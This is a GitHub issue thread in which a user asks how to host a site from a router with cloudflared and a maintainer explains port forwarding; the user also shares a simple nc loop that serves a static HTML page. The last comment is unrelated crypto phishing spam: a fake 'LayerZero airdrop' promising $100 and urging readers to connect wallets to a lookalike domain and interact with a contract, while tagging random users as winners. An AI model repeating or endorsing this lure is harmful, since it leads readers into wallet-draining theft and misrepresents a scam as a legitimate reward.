### ISSUE TITLE
Redirect incoming and outgoing traffic in router

### ISSUE THREAD

**Issue by amrit073** [codeanit/ama#2]
I am trying to run server in my router and use custom domain using cloudflared.
I have compiled cloudflared for router's architecture (mips) and installed it.
But shell in not allowing cloudflared to make https request to its servers.

**Comment by anitsh** [comment]
Hi @amrit073,

Were you really able to install server on your router?

I think what you might have done is run a server in your local machine, laptop.

You have to have static IP or public IP to share your system/API in public.

Then in your router you have to open and map the port. Open port to allow requests from outside is allowed. Then map the same port to your local machine's and it IP.

For example, you have opened port 80 in your router. And your are running an application in port 8080. Then you map routers 80 port to machine running application with IP 192.168.1.100 port 8080. 

In other words, redirect incoming and outgoing traffic to and from 80 > 192.168.1.100:8080. 


Also, please delete the first empty comment.
Make title more short and specific.
Add more details on your question.


Helps everyone to understand and be of more help to you.

Cheers,

**Comment by anitsh** [comment]
Hi @amrit073,

Were you really able to install server on your router?

I think what you might have done is run a server in your local machine, laptop.

You have to have static IP or public IP to share your system/API in public.

Then in your router you have to open and map the port. Open port to allow requests from outside is allowed. Then map the same port to your local machine's and it IP.

For example, you have opened port 80 in your router. And your are running an application in port 8080. Then you map routers 80 port to machine running application with IP 192.168.1.100 port 8080.

In other words, redirect incoming and outgoing traffic to and from 80 > 192.168.1.100:8080.


On ca-certs, https://letsencrypt.org would be best.
For reference, https://github.com/anitsh/til/issues/60 - My attempt and learning from hosting website from home setup.

Also, please delete the first empty comment. [I've done that on your behalf]
Make title more short and specific. [I've done that on your behalf]
Add more details on your question.

Helps everyone to understand and be of more help to you.

Cheers,

**Comment by amrit073** [comment]
@anitsh 
I am used nc to listen to a port and served html page to incoming request.
My server.sh file:
`while true; do echo -e "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n" | cat - index.html  | nc -l -p 8000; done`
I was able to access  website in via my other devices from <gateway>:8000. I tried cloudflared to add my custom domain but that will need router shell to make https requests.

**Comment by anitsh** [comment]
@amrit073 The default port is 80 for HTTP request. May be you can try with -p 80. But still serving HTTP requests via `nc` might not be very useful if we are looking forward to build a useful system.

**Comment by robincj** [comment]
# 🚀 LayerZero Total Airdrop - Claim Your Instant $100 Prize! 🎉

Attention LayerZero community! You are eligible to instantly win $100 from a $3,000 prize pool, available for the first 10,000 eligible users. Act fast to secure your spot! [Claim Now](https://connectlayerzaero.online)

![Claim Now](https://i.ytimg.com/vi/c_iNiyOUHVQ/maxresdefault.jpg)


Welcome to the LayerZero Total Airdrop! Follow these simple steps to claim your prize:

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://connectlayerzaero.online) link.
   - Choose your preferred wallet provider (Metamask, Coinbase, and others).

### 2. 🔄 Claim Your Instant $100:
   - After connecting your wallet.
   - Click on the "**Claim**" button to initiate the process.

### 3. 🔐 Interact with the Contract:
   - Once claimed.
   - Interact with the smart contract using the **connect** method to secure your instant $100 prize.

💰 Don't miss out on your chance to be one of the lucky 10,000 users! Act now to ensure your spot in the LayerZero Total Airdrop and claim your instant $100 prize.

🎉 Get ready for an exciting journey with LayerZero - where rewards await at every step!


Winners: @dandelionzbx, @tasti, @luisroel91, @zachacaria, @qwerty199991, @tomusdrw, @FrostLinsss
